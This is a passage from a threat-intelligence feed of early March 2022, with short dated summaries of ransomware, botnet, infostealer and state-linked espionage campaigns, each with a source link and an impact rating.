Summary:: A new ransomware as a service has been identified by BlackBerry researchers dubbed as LokiLocker. It targets English-speaking victims and Windows. The threat was first seen in the wild in mid-August 2021. LokiLocker encrypts victim’s files on local drives and network shares with a standard combination of AES for file encryption and RSA for key protection.

Source: https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware

Intel Source:: Avast

Intel Name:: DirtyMoe malware

Date of Scan:: 2022-03-21

Impact:: LOW

Summary:: Researchers from Avast warned of the rapid growth of the DirtyMoe botnet which passed from 10 000 infected systems in 2020 to more than 100 000 in the first half of 2021. Experts defined DirtyMoe as a complex malware that has been designed as a modular system. The Windows botnet has been active since late 2017 it was mainly used to mine cryptocurrency but it was also involved in DDoS attacks in 2018.

Source: https://decoded.avast.io/martinchlumecky/dirtymoe-5/

Intel Source:: Cisco Talos

Intel Name:: BlackCat and BlackMatter ransomware connection

Date of Scan:: 2022-03-21

Impact:: MEDIUM

Summary:: Cisco Talos researchers analysed relation between BlackCat ransomware and BlackMatter ransomware. Researchers has concluded with moderate confidence that the same affiliate are behind both the ransomware operators as same C2 Infrastructure used for certain attacks.

Source: https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

Intel Source:: STR

Intel Name:: EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22

Date of Scan:: 2022-03-21

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Trend Micro

Intel Name:: Cyclops Blink malware targets Asus Router

Date of Scan:: 2022-03-21

Impact:: HIGH

Summary:: Researchers from TrendMicro have analyzed technical capabilities of the Cyclops Blink malware variant that has been targeting ASUS routers and provides an extensive list of more than 150 current and historical Command and Control (C2) servers of the Cyclops Blink botnet.

Source: https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

Intel Source:: Palo Alto

Intel Name:: Cobalt Strike-an effective emulator

Date of Scan:: 2022-03-21

Impact:: LOW

Summary:: Cobalt Strike is a tool that emulates command and control communications and is widely used in real-world attacks but can also be used as a way to evade traditional firewall defenses. Cobalt Strike users control Beacon’s HTTP indicators through a profile and can select either the default profile or a customizable Malleable C2 profile.

Source: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/

Intel Source:: QI-ANXIN Threat Intelligence Center

Intel Name:: GhostWriter New Espionage Campaign Update

Date of Scan:: 2022-03-21

Impact:: MEDIUM

Summary:: CERT-UA found and analysed a malicious zip file which contains the Microsoft Compiled HTML Help file named dovidka.chm. The malicious file was designed to spread malware for espionage purposes against targets located in Ukraine that displays the logos of the Ukrainian President’s office and secret services with content relating to advice on dealing with the bombing.

Source: https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/

Intel Source:: Google

Intel Name:: Conti Gang working with IAB

Date of Scan:: 2022-03-21

Impact:: MEDIUM

Summary:: Google TAG team has discovered an operations of a threat actor dubbed 'EXOTIC LILY ' an initial access broker linked to the Conti and Diavol ransomware operations. EXOTIC LILY was first spotted exploiting a zero-day vulnerability in Microsoft MSHTML (CVE-2021-40444). After further investigation it is determined that EXOTIC LILLY is an initial access broker that uses large-scale phishing campaigns to breach targeted corporate networks.

Source: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

Intel Source:: ISC.SANS

Intel Name:: Qakbot infection with Cobalt Strike and VNC

Date of Scan:: 2022-03-18

Impact:: MEDIUM

Summary:: Researchers at SANS has disected

Source: https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/

Intel Source:: Prevailion

Intel Name:: WIZARD SPIDER massive phishing campaign

Date of Scan:: 2022-03-17

Impact:: MEDIUM

Summary:: Researchers at Prevailion earlier this year has identified a massive phishing campaign focused on collecting credentials of Naver users. Naver is a popular South Korean online platform comparable to Google that offers a variety of services (e.g. email news and search among many others). Researchers found overlaps with infrastructure which is historically linked with WIZARD SPIDER a Russian-based threat actor motivated towards initial access and ransomware operations.

Source: https://www.prevailion.com/what-wicked-webs-we-unweave/

Intel Source:: ASEC

Intel Name:: Gh0stCringe RAT targets MS-SQL and MySQL servers

Date of Scan:: 2022-03-17

Impact:: MEDIUM

Summary:: ASEC team has analysed and monitored a malware which being distrbuted to vulnerable MySQL and MSSQL servers. ASEC Team named the malware as Gh0stCringe also known as CirenegRAT.

Source: https://asec.ahnlab.com/en/32572/

Intel Source:: STR

Intel Name:: CaddyWiper TTP_Seeder_Queries_15/03/222

Date of Scan:: 2022-03-16

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: netlab360

Intel Name:: B1txor20 Botnet exploits Log4j vulnerability

Date of Scan:: 2022-03-16

Impact:: MEDIUM

Summary:: Researchers at Qihoo 360's Netlab has captured an ELF file on their honeypot system which was first observed propagating through the Log4j vulnerability on February 9 2022. After closely analysing the file they named it B1txor20 based on the propogation using the file name 'b1t ' the XOR encryption algorithm and the RC4 algorithm key length of 20 bytes.

Source: https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_en/

Intel Source:: Cyble

Intel Name:: Pandora Ransomware

Date of Scan:: 2022-03-16

Impact:: MEDIUM

Summary:: Cyble Research Labs has analysed a sample of Pandora ransomware. After analysing the sampled Cyble believe that Pandora ransomware is a re-brand of ROOK ransomware as they observed similar behaviour in the past. Pandora ransomware gang is suspected of leveraging the double extortion method.

Source: https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/

Intel Source:: ESET

Intel Name:: CaddyWiper Malware

Date of Scan:: 2022-03-16

Impact:: HIGH

Summary:: ESET Researcher has idenfied third Wiper malware impacting Ukraine dubbed as CaddyWiper. This wiper is relatively smaller compiled size of just 9KB than previous wiper attacks. This is a developing threat currently only one hash is available.

Source: https://twitter.com/ESETresearch/status/1503436420886712321 https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/ https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html

Intel Source:: CISA

Intel Name:: Russian Threat Actors exploits PrintNightMare Vulnerability

Date of Scan:: 2022-03-16

Impact:: HIGH

Summary:: In an Joint Advisory by FBI & CISA they are warning organizations that Russian state-sponsored threat actors have gained network access through exploitation of default MFA protocols and a known vulnerability. This advisory also provides TTPs IOCs and recommendations to protect against Russian state-sponsored malicious cyber activity.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

Intel Source:: Securonix

Intel Name:: EnemyBot - Linux based Botnet

Date of Scan:: 2022-03-16

Impact:: HIGH

Summary:: Securonix Threat Labs has identified a Linux based botnet dubbed as EnemyBot. STL correlates EnemyBot to LolFMe botnet which contains similar strings such as “watudoinglookingatdis”. The EnemyBot malware also have ability to steal data via HTTP POST which STL identified in their analysis the malware was sending the data back to the original IP address.

Source: https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/

Intel Source:: CERT-UA

Intel Name:: GrimPlant and GraphSteel used to attack Ukraine

Date of Scan:: 2022-03-15

Impact:: MEDIUM

Summary:: CERT-UA identified cyberattacks being launched by the UAC-0056 threat group targeting state authorities of Ukraine using phishing emails with instructions on improving information security that would deliver an executable leading to a Cobalt Strike beacon.

Source: https://cert.gov.ua/article/37704 https://socprime.com/blog/cobalt-strike-beacon-grimplant-and-graphsteel-malware-massively-spread-by-uac-0056-threat-actors-in-targeted-phishing-emails-cert-ua-alert/

Intel Source:: SecureList

Intel Name:: Dirty Pipe vulnerability in Linux kernel

Date of Scan:: 2022-03-15

Impact:: HIGH

Summary:: Security researcher Max Kellermann discovered a high severity vulnerability in the Linux kernel which can be used for local privilege escalation. It affects the Linux kernels from 5.8 through any version before 5.16.11 5.15.25 and 5.10.102 and can be used for local privilege escalation.

Source: https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/

Intel Source:: CrowdStrike

Intel Name:: NIGHT SPIDER Zloader Campaign

Date of Scan:: 2022-03-15

Impact:: LOW

Summary:: Researchers from CrowdStrike tracked an ongoing widespread intrusion campaign leveraging bundled .msi installers to trick victims into downloading malicious payloads alongside legitimate software. This was used to execute NIGHT SPIDER’s Zloader trojan.

Source: https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/

Intel Source:: STR

Intel Name:: North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22

Date of Scan:: 2022-03-15

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Security Soup

Intel Name:: Decoding Dannabot malware

Date of Scan:: 2022-03-15

Impact:: LOW

Summary:: A researcher on security soup wrote about VBS based DanaBot downloader which have added pbfuscation scheme and few other TTPs to its arsenal.

Source: https://security-soup.net/decoding-a-danabot-downloader/

Intel Source:: Blackberry

Intel Name:: CryptBot Infostealer disguised as Cracked Software

Date of Scan:: 2022-03-14

Impact:: LOW

Summary:: Researchers from BlackBerry cam across a new and improved version of the malicious infostealer CryptBot which have been released via compromised pirated sites which appear to offer “cracked” versions of popular software and video games.

Source: https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer

Intel Source:: NovaSOC

Intel Name:: Russian Threat Actors using Google Ad Delivery Network

Date of Scan:: 2022-03-14

Impact:: MEDIUM

Summary:: Researchers from Novasoc caught Russian Actors Utilizing Google Ad Delivery Network to Establish Browser Connections. Russian IP addresses has been using the Google ad delivery network as a mechanism to initiate client network connections.

Source: https://innovatecybersecurity.com/security-threat-advisory/novasoc-catches-russian-actors-utilizing-google-ad-delivery-network-to-establish-browser-connections/

Intel Source:: ASEC

Intel Name:: Infostealer Distributed via YouTube

Date of Scan:: 2022-03-14

Impact:: LOW

Summary:: ASEC researchers has discovered an Infostealer being distributed voa YouTube. The threat actor disguised the malware as a game hack and uploaded the video on YouTube with dowload link of the malware.

Source: https://asec.ahnlab.com/en/32499/

Intel Source:: Security Joes

Intel Name:: Sockbot in GoLand

Date of Scan:: 2022-03-14

Impact:: MEDIUM

Summary:: Security Joes incident response team responded to malicious activity in one of their clients' network infrastructure. During the investigation it was discovered that the threat actors used two customized GoLang-compiled Windows executables “lsassDumper” and “Sockbot” to perform the attack.

Source: https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

Intel Source:: seguranca-informatica

Intel Name:: Brazilian trojan targets Portuguese users

Date of Scan:: 2022-03-14

Impact:: LOW

Summary:: A new variant of Brazilian trojan have targeted users from Portugal and there seems to be no difference in terms of sophistication in contrast to other well-known trojans such as Maxtrilha URSA and Javali.The trojan has been disseminated via phishing templates impersonating Tax services in Portugal.

Source: https://seguranca-informatica.pt/brazilian-trojan-impacting-portuguese-users-and-using-the-same-capabilities-seen-in-other-latin-american-threats/#.Yi8lzRBBxHb

Intel Source:: esentire

Intel Name:: TunnelVision exploits VMWare Horizon Servers

Date of Scan:: 2022-03-14

Impact:: MEDIUM

Summary:: Researchers from esentire found suspicious account creation and credential harvesting attempts on a customer’s endpoint and it was tracked to VMware Horizon server. The attack with high confidence was linked to TunnelVision Iranian-aligned threat actor.

Source: https://www.esentire.com/blog/exploitation-of-vmware-horizon-servers-by-tunnelvision-threat-actor

Intel Source:: Cisco Talos

Intel Name:: Remcos RAT distribution campaign take advantage of Ukraine Invasion

Date of Scan:: 2022-03-14

Impact:: MEDIUM

Summary:: Cisco Talos Reserachers has observed that Threat Actors are using Email lures themes related to Russia-Ukraine conflict fundraising and humanitrain support. These emails are related to scam activity and delivering Remcos RAT.

Source: https://blog.talosintelligence.com/2022/03/ukraine-invasion-scams-malware.html

Intel Source:: Cisco Talos

Intel Name:: Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis

Date of Scan:: 2022-03-14

Impact:: MEDIUM

Summary:: Researchers analysed the malware/tool called 'Liberator' by disBalancer group. Furthermore the post has been updated with two new IoCs.

Source: https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.htmll

Intel Source:: Cylera

Intel Name:: Kwampirs Malware Linked to Shamoon APT

Date of Scan:: 2022-03-14

Impact:: MEDIUM

Summary:: Cylera Labs assess with medium to high confidence that Shamoon and Kwapirs are the same group or close collaborators sharing updates techniques and code over the course of multiple years. Evolution of Kwampris and its connections with Shamoon 1 and 2 are also well documented in the recent report by Cylera.

Source: https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf

Intel Source:: Netskope

Intel Name:: Formbook/XLoader targets Ukraine Government Officials

Date of Scan:: 2022-03-14

Impact:: MEDIUM

Summary:: Netskope Threat Labs has analysed a phishing email targeting high-rank government officials in Ukraine. The email seems to be part of new spam campaign which contians infected spreadsheet. The email also contians a .NET executable responsible for loading Formbook malware in a multi-stage chain.

Source: https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Formbook/IOCs

Intel Source:: Abnormal

Intel Name:: Online Contact forms delivering BazarLoader

Date of Scan:: 2022-03-11

Impact:: MEDIUM

Summary:: Cybercriminals are always looking for new ways to targets users Researchers at Abnormal Security has identified attacks targeting users through an online contact form. They also observed that these attacks leads to deliverying BazarLoader malware.

Source: https://abnormalsecurity.com/blog/bazarloader-contact-form

Intel Source:: Cisco Talos

Intel Name:: Disguised malware exploit Ukrainian sympathizers

Date of Scan:: 2022-03-11

Impact:: MEDIUM

Summary:: Threat Actors are attempting to exploit Ukrainian sympathizers by offering malware as cyber tools to target Russian entities. Cisco Talos analysed one such instance where a threat actor offering DDoS tool on Telegram to target Russian websites. They downloaded the file and found it to be a infostealer malware.

Source: https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html

Intel Source:: Lab52

Intel Name:: LazyScripter APT H-Worm campaign

Date of Scan:: 2022-03-11

Impact:: MEDIUM

Summary:: Researchers at Lab52 has tracked the activity of LazyScripter APT and discovered a new malware and new elements of infrastructure under LazyScripter arsenal. Further analysing the LazyScripter malware they found the usage of popular and open source online obfuscating tool for scripts which would inject their own downloader for njRAT.

Source: https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/

Intel Source:: Malwarebytes

Intel Name:: FormBook malware targets Ukrainians

Date of Scan:: 2022-03-11

Impact:: MEDIUM

Summary:: MalwareBytes researchers discovered recently discovered about a malicious spam campaign dropping the Formbook stealer specifically targeting Ukrainians. The email lure which are being sent is written in Ukrainian.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%ef%b8%8f/

Intel Source:: Cisco Talos

Intel Name:: MuddyWater subgroup leveraging maldocs and RATs

Date of Scan:: 2022-03-11

Impact:: MEDIUM

Summary:: Cisco Talos believe with high confidence that there are sub-groups operating under MuddyWater umberalla targeting Turkey and Arabian peninsula countries with maldocs and Windows script file based RAT. These subgroups are highly motivated to conduct espionage intellectual property theft implant malware and ransomware in targeted network.

Source: https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html

Intel Source:: Sophos

Intel Name:: Email interjection by Qakbot

Date of Scan:: 2022-03-11

Impact:: MEDIUM

Summary:: Sophos Labs have discovered Qakbot botnet's new technique where the botnet spread itself around by inserting malicious replies into the middle of existing email conversations. These email interruption is in the form of reply-all message include a short sentence and a link to download a zip file containing a malicious office document.

Source: https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/

Intel Source:: Avast

Intel Name:: Racoon Stealer leverages Telegram

Date of Scan:: 2022-03-10

Impact:: LOW

Summary:: Researchers from Avast recently noted Raccoon Stealer which is a password stealing malware using the Telegram infrastructure to store and update actual C&C addresses. Raccoon Stealer is getting distributed via downloaders: Buer Loader and GCleaner.

Source: https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/

Intel Source:: FBI FLASH

Intel Name:: Conti Ransomware Indicator of Compromise

Date of Scan:: 2022-03-10

Impact:: HIGH

Summary:: A join advisory has been released by FBI NSA and CISA detailing about the updated indicators of compromise of Conti ransomware and their TTPS. The ransomware have been very active and have included attack vectors like TrickBot and CobaltStrike.

Source: https://www.cisa.gov/uscert/sites/default/files/publications/AA21-265A-Conti_Ransomware_TLP_WHITE.pdf

Intel Source:: Avast

Intel Name:: Prometheus Ransomware Decrypted

Date of Scan:: 2022-03-10

Impact:: LOW

Summary:: Avast researchers have recently released decryptor for the Prometheus Ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.

Source: https://decoded.avast.io/threatresearch/decrypted-prometheus-ransomware/

Intel Source:: Lumen

Intel Name:: Emotet Resurgence

Date of Scan:: 2022-03-10

Impact:: HIGH

Summary:: The infamous malware 'Emotet' returned on November 2021 after a 10 month gap is once again showing signs of steady growth. Researchers at Lumen Black Lotus Labs have determined a strong resurgence of Emotet with 130 000 unique bots spread across 179 countries since its return.

Source: https://blog.lumen.com/emotet-redux/

Intel Source:: Fortinet

Intel Name:: Agent Tesla RAT campiagn

Date of Scan:: 2022-03-09

Impact:: HIGH

Summary:: FortiGaurd Labs analysed a phishing email impersonate as Ukraine based materials and chemical manufacturing company sharing purchase order. The phishing email has PPT as attachment that is multi-stage efforts to deploy the Agent Telsa RAT.

Source: https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla

Intel Source:: CERT-UA

Intel Name:: GhostWriter New Espionage Campaign

Date of Scan:: 2022-03-09

Impact:: MEDIUM

Summary:: CERT-UA found and analysed a malicious zip file which contains the Microsoft Compiled HTML Help file named dovidka.chm. The malicious file was designed to spread malware for espionage purposes against targets located in Ukraine that displays the logos of the Ukrainian President’s office and secret services with content relating to advice on dealing with the bombing.

Source: https://cert.gov.ua/article/37626 https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/

Intel Source:: Trend Micro

Intel Name:: Nokoyawa Ransomware linked to Hive

Date of Scan:: 2022-03-09

Impact:: MEDIUM

Summary:: TrendMicro researchers came across a new ransomware which had similarities with Hive ransomware like their attack chain teh tools used to the order in which they execute various steps. Most of targets of the ransomware are located in South America.

Source: https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html

Intel Source:: Trend Micro

Intel Name:: RURansom Wiper Targets Russia

Date of Scan:: 2022-03-09

Impact:: LOW

Summary:: Recently TrendMicro researchers analyzed sample released by MalwareHnterTeam which as per them is a wiper but decoyed like a ransomware and it was targeting Russia. The malware is written in .NET programming language and spreads as a worm.

Source: https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html

Intel Source:: Mandiant

Intel Name:: APT41 targeting US Government

Date of Scan:: 2022-03-09

Impact:: HIGH

Summary:: Researchers at Mandiant claiming that they became aware of a campaign in May 2021 when they were called in to investigate an attack on US government network. An analysis revealed that the attack had likely carried out by Chinese nation state group APT41. Researchers has confirmed that the hackers have compromised the networks of at least six U.S. state government organizations between May 2021 and February 2022.

Source: https://www.mandiant.com/resources/apt41-us-state-governments

Intel Source:: STR

Intel Name:: APT41_TTP_Seeder_Queries_070322

Date of Scan:: 2022-03-09

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: STR

Intel Name:: UNC1151_TTP_Seeder_Queries_070322

Date of Scan:: 2022-03-09

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Proofpoint

Intel Name:: TA416 targets European Government

Date of Scan:: 2022-03-08

Impact:: HIGH

Summary:: Researchers at Proofpoint has discovered a Threat group TA416 targeting European diplomatic entities including an individuals involve in refguee and migrant services. TA416 group has assessed to be aligned with Chinese nation state which exploits web vulnerabilities to profile their targets. Researchers identified the campaign is escalated since the tension between Russia Ukraine and NATO members in Europe.

Source: https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

Intel Source:: FBI FLASH

Intel Name:: RagnarLocker Ransomware IoCs

Date of Scan:: 2022-03-08

Impact:: MEDIUM

Summary:: Federal Bureau of Investigation (FBI) published a new FLASH report that provides additional IOCs associated with RagnarLocker ransomware. The FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware.

Source: https://www.ic3.gov/Media/News/2022/220307.pdf

Intel Source:: Fortinet

Intel Name:: Emotet recent campaign using MS Excel

Date of Scan:: 2022-03-08

Impact:: HIGH

Summary:: Fortinet researchers has conducted a deep research on 500 Excel files which were involved in delivering Emotet Trojan. Researchers analysed the Excel file leveraged to spread Emotet anti-analysis techniques used persistence on victim's deivce communicates with C2 servers and how modules are delivered loaded and executed on target system.

Source: https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one

Intel Source:: ASEC

Intel Name:: Webhards distributing njRAT

Date of Scan:: 2022-03-08

Impact:: LOW

Summary:: ASEC researchers has identified njRAT malware is being distributed through webhard. Webhard is a platform used to distribute malware and it is mainly used by attackers to target Korean users. The malware disguised as an adult game that was uploaded in webhard.

Source: https://asec.ahnlab.com/en/32450/

Intel Source:: Google

Intel Name:: Threat Landscape around Ukraine

Date of Scan:: 2022-03-08

Impact:: MEDIUM

Summary:: The Google Threat Analysis Group (TAG) has observed phishing campaigns and espionage activity from a range of threat actors including FancyBear (APT28) and Ghostwriter targeting Ukraine. Activities from Mustang Panda was also noted.

Source: https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/

Intel Source:: CrowdStrike

Intel Name:: PROPHET SPIDER Exploits Citrix ShareFile

Date of Scan:: 2022-03-08

Impact:: MEDIUM

Summary:: CrowdStrike Inteligence team has investigated an incident where PROPHET SPIDER targeting Microsoft IIS by exploiting CVE-2021-22941. PROPHET SPIDER first spotted on May 2017 that intially access to the targeted networks by compromising vulnerable web servers.

Source: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/

Intel Source:: Qualys

Intel Name:: AvosLocker group new variant targets Linux systems

Date of Scan:: 2022-03-07

Impact:: MEDIUM

Summary:: AvosLocker ransomware group made its first presence in June 2021 targeting Windows machine. Recently researchers at Qualys has identified that the AvosLocker group is also targeting Linux environments. The AvosLocker ransomware group advertises their latest ransomware variants on the Darkweb Leak site and mentioned that tthey have added support for encrypting Linux systems specifically targeting VMware ESXi virtual machines.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/

Intel Source:: Curated Intel

Intel Name:: Global credential harvesting campaign

Date of Scan:: 2022-03-07

Impact:: MEDIUM

Summary:: Researchers from Curated Intelligence recently tracked a new global credential harvesting campaign targeting Microsoft accounts through a range of phishing emails masquerading as ‘shared document’ notifications which deliver an embedded URL that leads to a fake Adobe Document Cloud application login page.

Source: https://www.curatedintel.org/2022/03/curated-intel-threat-report-adobe.html

Intel Source:: Telsy

Intel Name:: Cyber campaign against Indian Government

Date of Scan:: 2022-03-07

Impact:: LOW

Summary:: Researchers from Telsy identified a spear phishing campaign targetting Indian government. The threat actors are using legitimate portal as C2 and encrypted HTTPS communication. Legitimate sites were used as cobalt strike C&C.

Source: https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/

Intel Source:: Malwarebytes

Intel Name:: FormBook targets Oil & Gas companies

Date of Scan:: 2022-03-07

Impact:: MEDIUM

Summary:: During our random intel gathering we identified a tweet from Malwarebytes Threat Intelligence which states that FormBook continues to target Oil and Gas Companies. It also has potential IoCs. Few hours later Malwarebytes has published a blog with the findings. The campaign was delivered by a targeted email that contained two attachments one is a pdf file and the other an Excel document.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/03/beware-of-malware-offering-warm-greetings-from-saudi-aramco/ https://twitter.com/MBThreatIntel/status/1499435858537107459

Intel Source:: Trend Micro

Intel Name:: Multi malware campaign on Ukraine

Date of Scan:: 2022-03-04

Impact:: HIGH

Summary:: Trend Micro Research have verified and validated a number of alleged cyber attacks carry out by multiple groups in support of both the countries Russia Ukraine. Researchers have analysed internal data and external reports to provide these information.

Source: https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

Intel Source:: Cofense

Intel Name:: Russia-Ukraine Conflict Leverages Phishing Themes

Date of Scan:: 2022-03-03

Impact:: MEDIUM

Summary:: As Russia Ukraine conflict on the ground and cyber front going hand in hand. Cofense Phishing Defense Center monitoring phishing emails related to the conflict and has identifed malicious campaign that are using conflict as a lure to target users and enterprises. However Cofense do not have any evidence to support the phishing campaign attribution towards the countries directly involved in war.

Source: https://cofense.com/blog/russia-ukraine-conflict-leverages-phishing-themes

Intel Source:: SecureWorks

Intel Name:: Domains Linked to Phishing Attacks Targeting Ukraine

Date of Scan:: 2022-03-03

Impact:: MEDIUM

Summary:: Researchers at SecureWorks CTU has investigated a warning published by CERT-UA on 25th Feb 2022 regarding the phishing attacks targeting Ukrainian military personnel and government. Researchers attributed this campaign to MOONSCAPE threat group whereas CERT-UA attributed to UNC1151 APT group linked to Belarusian government.

Source: https://www.secureworks.com/blog/domains-linked-to-phishing-attacks-targeting-ukraine

Intel Source:: Zscaler

Intel Name:: DanaBot attacks Ukrainian MOD

Date of Scan:: 2022-03-03

Impact:: MEDIUM

Summary:: On 2 Mar 2022 in the midst of Russia Ukraine conflict Zscaler identified a threat actor launched an HTTP-based DDoS attack against the Ukrainian Ministry of Defense's webmail server. The threat attack is using DanaBot to launch DDoS attack and deliver second-stage malware payload using the download and execute command.

Source: https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense

Intel Source:: Proofpoint

Intel Name:: TA445 Targets European Governments

Date of Scan:: 2022-03-02

Impact:: HIGH

Summary:: The Proofpoint Threat Research team has identified a likely nation-state sponsored phishing campaign using a possibly compromised Ukrainian armed service member’s email account to target European government personnel with a Lua-based malware dubbed SunSeed.

Source: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails

Intel Source:: Cyble

Intel Name:: Emotet Malware Updated TTPs

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Cyble researchers came across email phishing campaigns by Emotet malware and these were similar to old ones which used spam emails with malicious MS Excel files as the initial attack vector to infect targets. It was also observed that Emotet is rebuilding its botnet with the help of the TrickBot malware.

Source: https://blog.cyble.com/2022/02/26/emotet-malware-back-in-action/

Intel Source:: Fortinet

Intel Name:: SoulSearcher Malware

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Researchers from Fortinet have analyzed the evolution of SoulSearcher Malware which have been targting Windows and collecting ssensitive information and executes additional malicious modules.

Source: https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware

Intel Source:: STR

Intel Name:: Conti Leaks_Seeder_Queries_010322

Date of Scan:: 2022-03-02

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Sophos

Intel Name:: Conti and Karma attacked Healthcare

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Sophos Labs researchers identified that two ransomware groups Conti & Karma have exploited ProxyShell vulnerabilty to gain access to the network of healthcare provider in Canada with very different tactics. Karma group exfiltrated data but did not encrypt the targeted systems. While Conti came into the network later but but encrypted the targeted systems.

Source: https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/

Intel Source:: STR

Intel Name:: RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322

Date of Scan:: 2022-03-02

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: AT&T

Intel Name:: BlackCat Ransomware- Technical Analysis

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: AT&T researchers recently analyzed BlackCat ransomware samples which was quite active in Jan 2022. The keytakaways from their analysis was that the ransomware is coded in Rust and targets multiple platform WINDOWS AND LINUX.

Source: https://cybersecurity.att.com/blogs/labs-research/blackcat-ransomware

Intel Source:: Security Intelligence

Intel Name:: TrickBot upgrades AnchorDNS Backdoor

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Researchers from IBM discovered a updated version of Trickbot Group’s AnchorDNS backdoor being used in recent attacks ending with the deployment of Conti ransomware. AnchorDNS is notable for communicating with its Command and Control (C2) server using the DNS protocol.

Source: https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/

Intel Source:: Barracuda

Intel Name:: DDoS botnets cryptominers exploits Log4shell

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Barracuda researchers have analyzed botnet and cryptobots exploiting Log4shell vulnerabilities and it has been constant since two months. They noticed that major of attacks came from IP addresses in the U.S. with half of those IP addresses being associated with AWS Azure and other data centers.

Source: https://blog.barracuda.com/2022/03/02/threat-spotlight-attacks-on-log4shell-vulnerabilities/

Intel Source:: Huntress

Intel Name:: BABYSHARK Malware

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Researchers at Huntress has identified a APT group activity which was attributed to North Korean threat actors targeting national security institutes. The North Korean APT using a malware family called BABYSHARK this variant of malware customized to specific victim environment.

Source: https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood

Intel Source:: Symantec

Intel Name:: Daxin Backdoor espionage campaign

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Researchers from Symantec found a new highly sophisticated piece of malware being used by a Chinese threat actor and the backdoor is dubbed as Daxin. Most of the targets have been government organizations and have been interest of China. The malware has been also called the most advanced type ever used by China linked threat actors.

